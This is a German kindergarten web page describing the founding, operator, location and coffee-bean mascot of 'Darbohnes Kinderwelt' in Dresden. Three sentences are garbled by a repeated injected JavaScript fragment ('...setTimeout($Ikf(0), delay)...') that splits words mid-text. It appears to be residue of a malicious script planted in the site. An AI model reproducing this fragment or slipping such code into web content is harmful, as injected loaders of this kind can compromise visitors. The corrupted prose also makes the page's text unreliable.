Träger & Gründung

Träger und Gründung

„Darbohnes Kinderwelt“ ist eine private Kindertageseinrichtung und gehört zum priva-ten Träger der Niedersedlitzer Kinderlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and GmbH. Es handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelt sich hierbei um ein Pro-jekt, welches in Zusammenarbeit mit der VEM Vermögensverwaltung GmbH (heute die Immopact Dresden GmbH) realisiert wurde.

Zum 01.04.2006 eröffnete unsere private Kindertageseinrichtung „Darbohnes Kin-derwelt“, welche auf dem Gelände des ehemaligen Hermetikmotorenwerkes aus alten Fabrikgebäuden rekonstruiert und umgebaut wurde.
Die Darbohne ist das Maskottchen oder Logo unserer Kindertagesstätte. Die Firma J.J. Darboven Hamburg (www.darboven.com), welche durch die Zusammenarbeit mit dem angrenzenden Indoorspielplatz „Kidsplanet“ (www.kidsplanet-dresden.de) auf unsere Kita aufmerksam geworden ist, gab die Rechte für unser beliebtes Kita-Maskottchen frei.

Eine lustige kleine Puppe mit dem Rumpf einer Kaffeebohne. Zum einen soll diese für die Kinder der Niedersedlitzer Kindertagesstätte Freundin und Begleiterin sein und zum andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen für die kleinen Dresdner ein Erkennungssymbol unserer Kita.

 

Tel.: 0351 5003901
Fax: 0351 5003903
Siemensstraße 9
01257 Dresden